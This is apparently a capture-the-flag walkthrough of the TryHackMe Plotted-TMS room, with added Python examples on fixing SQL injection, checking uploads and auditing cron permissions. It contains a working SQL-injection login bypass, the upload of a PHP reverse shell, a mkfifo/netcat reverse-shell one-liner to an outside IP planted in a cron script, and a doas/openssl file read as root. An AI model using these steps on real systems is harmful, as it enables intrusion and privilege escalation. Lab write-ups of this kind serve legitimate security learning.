Plotted-TMS is an easy room, but everything here is plotted! Hacking a Traffic Offense Management System.
First let's scan the IP and find some information to work with.
Enumerate, enumerate, enumerate
Detect open ports:
nmap -sC -sV plotted.thm
After running nmap we detect three open ports: 22, 80 and 445. If you pay attention, port 445 is not a Samba server but an HTTP server running Apache.
At this point we have:
- 1 SSH Server (22)
- 2 HTTP Servers (80-445)
Both web servers show the Apache default page, so it's time to enumerate them and find something juicy.
Find folders and files on the web servers
Port 80 has nothing, as you can see in the next image.
We have another port to investigate, port 445.
Great, we found a Traffic Offense Management System web app to investigate, and a link to the login page.
Great, we have a PHP login page. Here I've tried the common admin:admin but it fails, so it's time for SQLi; after a few manual tests I am in!
admin' or 1+1--'
Checking the profile page, it is possible to upload a profile image... or maybe a reverse shell? 😀
You can also use sqlmap; the username parameter is vulnerable.
Upload a PHP reverse shell as the profile picture, open a netcat listener on port 1234, then open the image and you have a shell.
Here I describe two options, netcat or msfconsole. I usually use msfconsole so I can run other modules against the remote system and upgrade more easily to a Meterpreter shell.
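To see why the username payload above works, and what stops it, here is an added example (my code, not the room's or the write-up's) that rebuilds the login check in Python against a constructed in-memory SQLite table. The string-concatenated query is the pattern the TMS login page presumably uses (an assumption, since the PHP source is not shown); the parameterized query is the fix.

```python
import sqlite3

# Constructed stand-in for the TMS user table (assumption: the real schema is unknown).
# Plaintext passwords are used only to keep the example short; store hashes in practice.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn

def login_concatenated(conn, username, password):
    """Vulnerable: user input is spliced into the SQL text, so quotes and
    comment markers in the input change the structure of the query."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # fail closed on any SQL error
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Fixed: the driver sends the values separately from the SQL text,
    so the input is only ever compared as a string, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

PAYLOAD = "admin' or 1+1--'"  # the exact username used in the write-up

def demo():
    db = make_db()
    # The concatenated query becomes:
    #   ... WHERE username = 'admin' or 1+1--' AND password = 'x'
    # 1+1 is a true condition and '--' comments out the password check,
    # so the first row (admin) is returned without knowing any password.
    bypassed = login_concatenated(db, PAYLOAD, "x")
    # The same string is just an unknown username to the parameterized query.
    blocked = login_parameterized(db, PAYLOAD, "x")
    legit = login_parameterized(db, "admin", "correct-horse-battery")
    return bypassed, blocked, legit
```

Running demo() returns ("admin", None, "admin"): the concatenated version logs the payload in as admin, the parameterized version rejects it and still accepts the real credentials.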
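The upload step works because the profile-picture handler trusts whatever it is given. As an added example (my code, not the application's), here is the kind of server-side check that would have rejected a PHP file presented as an image; the file names and byte strings are constructed for the demo.

```python
import os
import secrets

# Allowed extensions mapped to the magic bytes each format starts with.
SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def check_upload(filename, data):
    """Return (accepted, reason_or_new_name).

    Accepted files get a random server-chosen name, so the client's file name
    (and anything odd in it) never reaches the filesystem."""
    base = os.path.basename(filename)
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in SIGNATURES:
        return False, f"extension {ext or '(none)'} is not an allowed image type"
    if "." in stem:
        return False, "multiple extensions are not allowed"
    if not any(data.startswith(sig) for sig in SIGNATURES[ext]):
        return False, "file content does not match the declared image type"
    # Heuristic: a genuine image should not carry PHP or HTML tags anywhere in it.
    if b"<?" in data or b"<script" in data.lower():
        return False, "script markers found inside image data"
    return True, secrets.token_hex(16) + ext

# Constructed samples for the demo.
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_FILE = b"<?php echo 'not an image'; ?>"

def demo():
    """Accept a real PNG; reject a .php upload, a double extension,
    and PHP content hiding behind an image extension."""
    return {
        "avatar.png": check_upload("avatar.png", REAL_PNG)[0],
        "notimage.php": check_upload("notimage.php", PHP_FILE)[0],
        "picture.php.png": check_upload("picture.php.png", REAL_PNG + PHP_FILE)[0],
        "renamed.png": check_upload("renamed.png", PHP_FILE)[0],
    }
```

These checks are a first line only. The control that actually removes the risk in this room is to store uploads outside the web root, or in a directory where the web server does not execute PHP, and to re-encode images with an image library so that whatever was embedded in the original bytes is discarded.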
msfconsole -q -x "use multi/handler; set payload generic/shell_reverse_tcp; set lhost 10.8.154.49; set lport 1234; exploit"
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 10.10.181.46
lhost => 10.10.181.46
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > run
nc -lnp 1234
Stabilize the shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
Now it is time to escalate our privileges. I will run LinPEAS and check the output.
And LinPEAS found our entry point: a cron job running a script as plot_admin.
Let's verify our permissions on that folder.
ls -la /var/www/
The scripts folder is owned by our user/group, which is great: we can create files inside it or manipulate what is already there.
ls -la /var/www/scripts
As we can see we have a script owned by user plot_admin.
Let's think a little bit.
We own a folder and someone else created a script inside it. Do we have permission to write to that script?
Check the cron job output: it tells us the job runs as the plot_admin user. So?
If we replace the script's content with a bash reverse shell, it will be executed as plot_admin. Because we own the directory, we can rename the original script out of the way and put our own backup.sh in its place:
mv /var/www/scripts/backup.sh /var/www/scripts/backup_rfs.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.44.169 4444>/tmp/f
nc -lp 1234
chmod 777 /var/www/scripts/backup.sh
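What made this escalation possible is the combination the write-up describes: the web user owns /var/www/scripts while cron runs backup.sh inside it as plot_admin. As an added example (not part of the write-up or the room), here is a Python audit that parses system-crontab lines and flags scripts whose directory or file can be altered by someone other than the user cron runs them as. The crontab line and the temporary directory layout are constructed; the path and user name come from the write-up, the schedule is an assumption.

```python
import os
import pwd
import stat
import tempfile

# Constructed /etc/crontab-style entry; user and path from the write-up,
# the schedule is an assumption.
SAMPLE_CRONTAB = """\
# m  h  dom mon dow user        command
*/1  *  *   *   *   plot_admin  /var/www/scripts/backup.sh
"""

def parse_system_crontab(text):
    """Return (user, script_path) pairs from system crontab lines (6th field = user)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) >= 7:
            jobs.append((fields[5], fields[6]))
    return jobs

def audit_cron_script(script_path, cron_uid):
    """Findings for one script that cron executes as cron_uid.

    Ownership by root or by the cron user itself is fine; any other owner of
    the directory can rename the script and drop in a replacement, which is
    exactly what happened in this room."""
    findings = []
    d = os.stat(os.path.dirname(script_path))
    if d.st_uid not in (0, cron_uid):
        findings.append(f"parent directory owned by uid {d.st_uid}, not the cron user")
    if d.st_mode & stat.S_IWOTH:
        findings.append("parent directory is world-writable")
    elif d.st_mode & stat.S_IWGRP:
        findings.append("parent directory is group-writable")
    try:
        f = os.stat(script_path)
    except FileNotFoundError:
        findings.append("script is missing (dangling job)")
        return findings
    if f.st_uid not in (0, cron_uid):
        findings.append(f"script owned by uid {f.st_uid}, not the cron user")
    if f.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("script is group- or world-writable")
    return findings

def audit_crontab(text, resolve_uid=None, path_map=None):
    """Audit every job. resolve_uid maps a user name to a uid (default: pwd);
    path_map redirects crontab paths elsewhere (used by the offline demo)."""
    resolve_uid = resolve_uid or (lambda name: pwd.getpwnam(name).pw_uid)
    path_map = path_map or {}
    return {script: audit_cron_script(path_map.get(script, script), resolve_uid(user))
            for user, script in parse_system_crontab(text)}

def demo():
    """Rebuild the box's layout in a temp dir: a scripts/ directory owned by us
    (playing the web user) with backup.sh inside. Audit it first with cron
    running as a different, constructed uid and the directory group-writable,
    then hardened: owner-only write and cron running as the owner."""
    with tempfile.TemporaryDirectory() as tmp:
        scripts = os.path.join(tmp, "scripts")
        os.mkdir(scripts)
        os.chmod(scripts, 0o775)
        script = os.path.join(scripts, "backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(script, 0o744)
        redirect = {"/var/www/scripts/backup.sh": script}
        other_uid = os.getuid() + 1  # constructed: stands in for plot_admin
        bad = audit_crontab(SAMPLE_CRONTAB, lambda _: other_uid, redirect)
        os.chmod(scripts, 0o755)
        good = audit_crontab(SAMPLE_CRONTAB, lambda _: os.getuid(), redirect)
    return bad, good
```

Run audit_crontab() on the text of /etc/crontab and the files in /etc/cron.d to get a report per job; the demo() layout returns findings for the vulnerable arrangement and an empty list for the hardened one. The fix on a real host is the same as what the findings point at: the directory holding a cron script must be owned by root or by the account the job runs as, and must not be writable by the web user.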
TryHackMe Plotted-TMS PWNED
Finally, plot_admin is allowed to run openssl as root through doas, which is enough to read the root flag:
doas -u root openssl enc -in /root/root.txt
Congratulations on completing this room!
53f85e-RFS-040a9bdcab
Hope you enjoyed the journey! Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888